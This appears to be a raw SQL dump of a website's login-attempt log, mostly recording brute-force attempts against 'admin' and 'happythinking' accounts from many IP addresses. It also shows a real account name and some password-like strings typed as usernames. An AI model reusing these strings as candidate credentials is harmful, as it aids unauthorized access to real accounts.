(9147, 32920, 1694684572.566781, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgê\Z', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15'),
(9146, 32919, 1694684554.886234, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ·ˆª', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36'),
(9145, 32918, 1694684549.053996, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿn‹‘', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76'),
(9144, 32917, 1694684544.540580, 1, 'loginFailInvalidUsername', 'bluesky1211234!!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿœÊ%', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9143, 32916, 1694684541.534020, 1, 'loginFailInvalidUsername', 'happythinking@yahoo.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´ûëž', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Edg/84.0.522.63'),
(9142, 32915, 1694684535.110549, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ{ƒÄ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9141, 32914, 1694684531.410393, 1, 'loginFailInvalidUsername', 'study*20123!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÅ\Zf%', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Edg/84.0.522.63'),
(9140, 32913, 1694684516.746764, 1, 'loginFailInvalidUsername', 'admin1!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)ŽËM', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76'),
(9139, 32912, 1694684510.522090, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ}¦S¸', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36'),
(9138, 32911, 1694684482.785407, 1, 'loginFailInvalidUsername', 'happythinking@gmail.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg¤Æ‰', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9137, 32910, 1694684478.591966, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿsKsw', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9136, 32910, 1694684478.579192, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿsKsw', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9135, 32909, 1694684473.026024, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿR§L5', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Edg/84.0.522.63'),
(9134, 32908, 1694684460.210437, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ»ÌÇ—', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),
(9133, 32907, 1694684455.982360, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgo˜', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76'),
(9132, 32906, 1694684451.914510, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿv­<m', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36'),
(9131, 32905, 1694684449.696500, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ«ì8s', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9130, 32904, 1694684428.333135, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿq¨Ai', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9129, 32903, 1694684424.315864, 1, 'loginFailInvalidUsername', 'happythinking@verizon.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ$%Ï', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15'),
(9128, 32902, 1694684419.931654, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾íå', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),
(9127, 32901, 1694684407.638292, 1, 'loginFailInvalidUsername', 'happythinking@hanmail.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ{.j', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9126, 32900, 1694684400.853014, 1, 'loginFailInvalidUsername', 'happythinking@hanmail.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÞü', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.76'),
(9125, 32899, 1694684394.712611, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ$UÞl', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9120, 32810, 1694523949.971668, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿªRZE', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9119, 32807, 1694456154.930286, 0, 'logout', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),
(9118, 32806, 1694456097.021387, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),
(9124, 32898, 1694684363.207822, 1, 'loginFailInvalidUsername', 'bluesky1211234!123', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿµäh', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9123, 32897, 1694684359.833066, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ·YV8', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9121, 32846, 1694553300.655986, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿPòt³', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9122, 32889, 1694626515.088671, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ—ãGì', 'Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),
(10503, 51309, 1712320067.597753, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg`+~', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10502, 51308, 1712320066.523539, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ}>Î¨', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10501, 51307, 1712320063.821131, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿaÖ¦', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10500, 51306, 1712320052.719147, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1%q¼', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10499, 51305, 1712320052.523132, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1$É', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10498, 51303, 1712320030.099518, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯°Cí', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10497, 51302, 1712320021.644926, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ–kó•', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10496, 51301, 1712320021.390146, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÁ‰9', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10495, 51300, 1712320019.146793, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ–kç5', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10494, 51299, 1712320018.846174, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgpÊ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10493, 51298, 1712320012.232448, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ»úÊ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10492, 51297, 1712320012.163125, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹³º', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10491, 51296, 1712320009.909439, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿm²Ôä', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10490, 51295, 1712320009.020147, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ,¥0', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10489, 51294, 1712320005.366714, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgÓ†{', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10488, 51293, 1712320004.945091, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¿7ì', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10487, 51292, 1712320004.856697, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ·Wûö', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10486, 51291, 1712319997.029111, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹ÿF*', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10485, 51290, 1712319996.221376, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1$ð', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10484, 51289, 1712319989.537255, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾p''½', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10483, 51288, 1712319985.641258, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿº¾±ˆ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10482, 51287, 1712319978.521139, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´ö";', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10481, 51286, 1712319977.437358, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1•	*', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10480, 51285, 1712319975.500501, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ·±~@', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10479, 51281, 1712319953.767405, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿij+', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10478, 51280, 1712319943.616599, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ·S7‡', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10477, 51279, 1712319942.161703, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÈi8`', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10476, 51277, 1712319934.934410, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿOÜ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10475, 51276, 1712319933.532502, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÕ9,u', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10474, 51275, 1712319931.424023, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¿ýÀÞ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10473, 51273, 1712319921.064026, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿQút', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10472, 51272, 1712319920.321822, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿuË±š', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10471, 51271, 1712319919.515061, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ{çŸ¢', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10470, 51269, 1712319915.224539, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿE |â', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10469, 51268, 1712319913.023359, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¥ÀÊ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10468, 51267, 1712319899.835243, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ:P|', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10467, 51266, 1712319898.597517, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1ÍPV', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10466, 51264, 1712319879.272933, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ±J¸×', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10465, 51261, 1712319871.020652, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹Ââˆ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10464, 51260, 1712319870.221988, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ^Civ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10463, 51259, 1712319864.505785, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿVyC·', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10462, 51258, 1712319862.992119, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿqÒfn', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10461, 51257, 1712319849.145232, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ˜:‡', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10460, 51256, 1712319847.647822, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¡\0›|', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10459, 51255, 1712319847.045961, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ/	+$', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10458, 51253, 1712319841.425753, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿEÀ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10457, 51252, 1712319839.423899, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÁ*e', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10456, 51251, 1712319827.888772, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿxXJ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10455, 51250, 1712319827.418902, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ|‚"', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10454, 51249, 1712319824.906260, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ;™Vv', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10453, 51248, 1712319823.417257, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ}?uF', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10452, 51245, 1712319812.122559, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´Â);', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10451, 51244, 1712319799.977265, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ±R„#', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10450, 51243, 1712319798.020812, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿOr7B', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10449, 51242, 1712319797.869692, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿx8Ñ_', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10448, 51241, 1712319793.393522, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿsöŠ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10447, 51240, 1712319791.721062, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-â', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10446, 51238, 1712319776.577817, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿƒÝãG', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10445, 51237, 1712319774.560974, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÕ¬’', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10444, 51236, 1712319773.553194, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿiáýõ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10443, 51235, 1712319769.286312, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)i·±', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10442, 51234, 1712319763.045263, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¿r¬', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10441, 51234, 1712319763.029369, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¿r¬', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10440, 51232, 1712319758.866040, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿsöáŠ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10439, 51231, 1712319751.385673, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¼PG{', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10438, 51230, 1712319742.063341, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿuÛ…ž', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10437, 51229, 1712319741.561171, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg_–=', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10436, 51228, 1712319739.643930, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿˆž(&', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10435, 51227, 1712319739.442545, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1Ïö÷', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10434, 51223, 1712319710.520542, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¨ÂèH', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10433, 51221, 1712319705.822332, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿw^oÜ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10432, 51219, 1712319701.564761, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿYä', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10431, 51220, 1712319701.568260, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´¿;;', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10430, 51218, 1712319699.433031, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¡1g:', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10429, 51216, 1712319680.498944, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ“[+', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10428, 51215, 1712319679.464944, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ{ç}-', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10427, 51214, 1712319668.939073, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ³\0o*', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10426, 51213, 1712319664.518118, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´òD\\', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10425, 51212, 1712319660.927512, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿßÌå5', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10424, 51211, 1712319652.462183, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ³ÿ4¤', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10423, 51210, 1712319652.290307, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿËÖS–', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10422, 51209, 1712319651.138698, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿoëAN', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
